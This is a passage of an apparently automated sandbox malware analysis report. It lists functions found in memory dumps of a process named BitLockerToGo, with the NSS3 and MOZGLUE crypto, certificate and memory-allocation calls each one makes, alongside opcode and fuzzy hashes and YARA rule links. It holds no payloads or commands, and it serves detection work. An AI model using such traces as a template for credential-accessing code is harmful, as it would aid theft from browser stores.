                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB21D4B1E403854BE700CF549D44BAB3B64AF9130CF110269ED185B752F7B2E69C8293
                                                                                                                                                                                                                                                                                                                    Function 6CABACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CERT_NewCertList.NSS3 ref: 6CABACC2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA92F0A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA92F1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CA90A1B,00000000), ref: 6CA92AF0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA92B11
                                                                                                                                                                                                                                                                                                                    • CERT_DestroyCertList.NSS3(00000000), ref: 6CABAD5E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA9B41E,00000000,00000000,?,00000000,?,6CA9B41E,00000000,00000000,00000001,?), ref: 6CAD57E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CAD5843
                                                                                                                                                                                                                                                                                                                    • CERT_DestroyCertList.NSS3(?), ref: 6CABAD36
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92F50: CERT_DestroyCertificate.NSS3(?), ref: 6CA92F65
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA92F83
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CABAD4F
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 132756963-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a0f11b2af485ce57794de10b8ced68e1d685edb94f9d0fee72898a62ab7b23be
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 515aa3c4ec3ebcda7049f539e5560b07ee1b07a867fe34528d494e726957f12b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0f11b2af485ce57794de10b8ced68e1d685edb94f9d0fee72898a62ab7b23be
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621C6B1D011149BEF10DF68D9065EEB7F9EF05258F094168D81977700FB31AE99CBA1
                                                                                                                                                                                                                                                                                                                    Function 6CAEECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CAEF0AD,6CAEF150,?,6CAEF150,?,?,?), ref: 6CAEECBA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA987ED,00000800,6CA8EF74,00000000), ref: 6CAF1000
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: PR_NewLock.NSS3(?,00000800,6CA8EF74,00000000), ref: 6CAF1016
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA987ED,00000008,?,00000800,6CA8EF74,00000000), ref: 6CAF102B
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CAEECD1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CAEED02
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF116E
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CAEED5A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6e8f2a07390de3607d13449a9efb03f78d17ab56bfad61a03f86578bea48733f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 592184B1A007429BE700CF25D944B52B7E4BFA9348F15C215E81C87661E771E5D9C7D1
                                                                                                                                                                                                                                                                                                                    Function 6CB1EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CB07FFA,?,6CB09767,?,8B7874C0,0000A48E), ref: 6CB1EDD4
                                                                                                                                                                                                                                                                                                                    • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CB07FFA,?,6CB09767,?,8B7874C0,0000A48E), ref: 6CB1EDFD
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CB07FFA,?,6CB09767,?,8B7874C0,0000A48E), ref: 6CB1EE14
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: malloc.MOZGLUE(6CAE8D2D,?,00000000,?), ref: 6CAF0BF8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: TlsGetValue.KERNEL32(6CAE8D2D,?,00000000,?), ref: 6CAF0C15
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,6CB09767,00000000,00000000,6CB07FFA,?,6CB09767,?,8B7874C0,0000A48E), ref: 6CB1EE33
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3903481028-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 458ff2be34327e38c2ccefb4982d5be327e2eca3fad59efbe646e57a67f7cb63
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 71f40eb8a2181d6ee82f43415c210034d95626b0860b13d0d9d2612ce4b275c5
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 458ff2be34327e38c2ccefb4982d5be327e2eca3fad59efbe646e57a67f7cb63
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1311CA72A087D6ABDB509E65DC88B4AB7A8FF0435CF104531E919C2E40E330F464C7E2
                                                                                                                                                                                                                                                                                                                    Function 6C98B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C98B4F5
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C98B502
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C98B542
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C98B578
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: dabcc6d131e9e6395a879ea80f1ed3734b8a21caaab5aab3b81288d8580b7629
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 426cf5cef55b39acdd42dd5347c03da8908861d187236eaca40d4bca57b30a55
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dabcc6d131e9e6395a879ea80f1ed3734b8a21caaab5aab3b81288d8580b7629
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B11AF31A08B45C7D7118F29D804766B3B5FFAA319F289B0EE89953E01EBB1E5C5C790
                                                                                                                                                                                                                                                                                                                    Function 6CAB8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: dd247c9239d6baa5e49c2ca524661644b7806161bf9483f6f5faae44d02b72bf
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f55e7d9d3d0b7688a00722589e13bc95b83380fd92ef3aa489af88e106980d85
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd247c9239d6baa5e49c2ca524661644b7806161bf9483f6f5faae44d02b72bf
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1118F75605A119FD700AF78D5842ADBBF4FF05754F054929EC8897700E730E894CBD1
                                                                                                                                                                                                                                                                                                                    Function 6CB3AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CB25F17,?,?,?,?,?,?,?,?,6CB2AAD4), ref: 6CB3AC94
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CB25F17,?,?,?,?,?,?,?,?,6CB2AAD4), ref: 6CB3ACA6
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CB2AAD4), ref: 6CB3ACC0
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CB2AAD4), ref: 6CB3ACDB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3989322779-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 211f5d9de75c901d6cfa5dc552e4225f032d6eb5d7767469770ac8a430f7bfe1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c3fa6c26a803d6be8f6a40e700c5f2b2225e140bdb512a5ccc2d4f394d70a374
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 211f5d9de75c901d6cfa5dc552e4225f032d6eb5d7767469770ac8a430f7bfe1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E018CB1601B619BEB50DF69ED08743B7E8FF44A99B504839D85EC3A00E730F458CB91
                                                                                                                                                                                                                                                                                                                    Function 6C9B3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C97F20E,?), ref: 6C9B3DF5
                                                                                                                                                                                                                                                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C97F20E,00000000,?), ref: 6C9B3DFC
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9B3E06
                                                                                                                                                                                                                                                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C9B3E0E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACC00: GetCurrentProcess.KERNEL32(?,?,6C9731A7), ref: 6C9ACC0D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C9731A7), ref: 6C9ACC16
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: dfeec6cdfb942057770334122e8dde7531b2e19a3730b4f7a66ad733e34bd918
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4e114a230377c18aa089f64b61f0c168455963ad95dcf762367a2af5c007269d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfeec6cdfb942057770334122e8dde7531b2e19a3730b4f7a66ad733e34bd918
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF082B15002087BDB00AB54EC81DAB377CEF56628F140020FD1917740D635FE2586F7
                                                                                                                                                                                                                                                                                                                    Function 6CB3AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(?,6CB25D40,00000000,?,?,6CB16AC6,6CB2639C), ref: 6CB3AC2D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: TlsGetValue.KERNEL32(?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: EnterCriticalSection.KERNEL32(?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE24
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CABD079,00000000,00000001), ref: 6CADAE5A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE6F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE7F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: TlsGetValue.KERNEL32(?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEB1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEC9
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(?,6CB25D40,00000000,?,?,6CB16AC6,6CB2639C), ref: 6CB3AC44
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CB25D40,00000000,?,?,6CB16AC6,6CB2639C), ref: 6CB3AC59
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(8CB6FF01,6CB16AC6,6CB2639C,?,?,?,?,?,?,?,?,?,6CB25D40,00000000,?,6CB2AAD4), ref: 6CB3AC62
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1595327144-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1329be8462e60618d27fa4339b9e110a519a59cf7c211cc7161d3df0f6d5635f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7eb3c589e4db47964a3ff0fe6e9b9485135f8074beb13bf234dfce66a4b27df1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1329be8462e60618d27fa4339b9e110a519a59cf7c211cc7161d3df0f6d5635f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 810128B56002149BDF10DF55EDC0B467BA8EB88B58F688068E9498F746D735E848CBA2
                                                                                                                                                                                                                                                                                                                    Function 6CBACC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a34f92c2ff6f98c87bbfc137142232f2222cf71ca3a43e110b10e4ecafb2777
